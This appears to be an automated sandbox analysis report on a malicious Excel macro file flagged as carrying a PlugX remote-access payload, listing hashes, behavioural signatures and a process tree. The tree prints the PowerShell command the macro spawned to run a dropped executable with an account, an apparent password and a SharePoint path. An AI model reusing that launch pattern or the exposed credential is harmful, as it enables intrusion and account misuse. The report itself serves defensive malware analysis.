Analysis
-
max time kernel
144s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
29-03-2022 23:25
Static task
static1
Behavioral task
behavioral1
Sample
b4dfa03a75594d4eb89ee173a82f976245ef874079ffa9359c748d5ee9ff5d33.xlsm
Resource
win7-20220311-en
General
-
Target
b4dfa03a75594d4eb89ee173a82f976245ef874079ffa9359c748d5ee9ff5d33.xlsm
-
Size
1.6MB
-
MD5
81a70d33c490b0b2af21a11869c6c589
-
SHA1
8ebd33d404e0d6dd8eeb54165527534706e0829c
-
SHA256
b4dfa03a75594d4eb89ee173a82f976245ef874079ffa9359c748d5ee9ff5d33
-
SHA512
204a5bbc0516cb5c5662847c5ca43d3a96919fcc2d8815b3b0bcdc6d2d30fab01b0efec2a825c164728b5e8269bc73bc740f4da82f99c3de7b0ec7d0daf397c8
Malware Config
Signatures
-
PlugX Rat Payload 1 IoCs
resource yara_rule behavioral2/memory/1932-145-0x0000027262450000-0x00000272631E0000-memory.dmp PlugX -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1020 1932 powershell.exe 77 -
Process spawned suspicious child process 1 IoCs
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1772 1932 DW20.EXE 77 -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dwwin.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dwwin.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dwwin.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dwwin.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwwin.exe -
Modifies registry class 2 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 EXCEL.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff EXCEL.EXE -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\{3831766F-A500-405A-8C69-D5AA754572E5}\SPD.exe:Zone.Identifier EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1932 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 1932 EXCEL.EXE 1020 powershell.exe 1020 powershell.exe 1932 EXCEL.EXE 1932 EXCEL.EXE 1932 EXCEL.EXE 1932 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1932 EXCEL.EXE Token: SeDebugPrivilege 1020 powershell.exe -
Suspicious use of SetWindowsHookEx 15 IoCs
pid Process 1932 EXCEL.EXE 1932 EXCEL.EXE 1932 EXCEL.EXE 1932 EXCEL.EXE 1932 EXCEL.EXE 1932 EXCEL.EXE 1932 EXCEL.EXE 1932 EXCEL.EXE 1932 EXCEL.EXE 1932 EXCEL.EXE 1932 EXCEL.EXE 1932 EXCEL.EXE 1932 EXCEL.EXE 1932 EXCEL.EXE 1932 EXCEL.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1932 wrote to memory of 1520 1932 EXCEL.EXE 79 PID 1932 wrote to memory of 1520 1932 EXCEL.EXE 79 PID 1932 wrote to memory of 1020 1932 EXCEL.EXE 90 PID 1932 wrote to memory of 1020 1932 EXCEL.EXE 90 PID 1932 wrote to memory of 1772 1932 EXCEL.EXE 92 PID 1932 wrote to memory of 1772 1932 EXCEL.EXE 92 PID 1772 wrote to memory of 2380 1772 DW20.EXE 93 PID 1772 wrote to memory of 2380 1772 DW20.EXE 93
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\b4dfa03a75594d4eb89ee173a82f976245ef874079ffa9359c748d5ee9ff5d33.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "& ($env:TEMP + \"\SPD.exe\") \"[email protected]\" \"Nhh2H5urwHv0\" \"https://finansco.sharepoint.com/Delte dokumenter/Finansco Gruppen Fellesmappe/Modellporteføljer/\" \"Produktark MPF Kopi.xlsx\""2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1020
-
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 70122⤵
- Process spawned suspicious child process
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Windows\system32\dwwin.exeC:\Windows\system32\dwwin.exe -x -s 70123⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2380
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵PID:4292